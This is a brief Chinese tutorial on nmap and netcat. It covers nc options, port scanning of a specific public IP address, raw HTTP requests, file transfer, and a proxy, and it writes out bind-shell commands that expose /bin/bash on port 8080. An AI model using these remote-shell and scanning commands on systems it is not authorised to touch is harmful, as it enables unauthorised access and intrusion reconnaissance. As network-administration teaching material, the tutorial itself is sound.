nmap使用介绍 netcat使用介绍

一、常用网络工具介绍

1、nmap用于主机发现和端口扫描，用于入侵前的基本信息收集，功能非常丰富；

2、netcat用于网络连接和端口监听，在网络工具中享有瑞士军刀的美誉，非常短小精悍；

3、linux版本netcat：https://vault.centos.org/6.6/os/x86_64/Packages/nc-1.84-22.el6.x86_64.rpm

4、linux版本netcat：https://netcat.sourceforge.net

5、windows版本netcat：https://eternallybored.org/misc/netcat

nc命令参数：

-l   监听请求

-p  port，源端口

-w timeout，设置超时，默认不超时

-z  仅仅探测连接，不发送数据

-u  使用UDP协议

-v  打印更多信息

二、端口扫描

TCP端口扫描：
nc -v -z -w 1 211.149.156.144 1-1000 2>&1 | grep -v failed    
Connection to 211.149.156.144 80 port [tcp/http] succeeded!

UDP端口扫描：

nc -v -z -u -w 1 211.149.156.144 1-1000 2>&1 | grep -v failed

三、web服务通信

nc 3scard.com 80

GET / HTTP/1.1
Host: 127.0.0.1
Referrer: mypage.com
User-Agent: my browser

四、远程拷贝文件

1、监听端口：nc -l 1234 >data

2、发送文件：nc -w 10 127.0.0.1 1234 <data

五、远程shell

centos版nc创建shell：

mknod /tmp/mypipe p

/bin/bash 0</tmp/mypipe | nc -l 8080 1>/tmp/mypipe

官方版nc创建shell：

./netcat -l -p 8080 -e /bin/bash

连接远程shell：

nc 127.0.0.1 8080

六、代理功能

mknod /tmp/mypipe p

nc 3scard.com 80 0</tmp/mypipe | nc -l 8080 1>/tmp/mypipe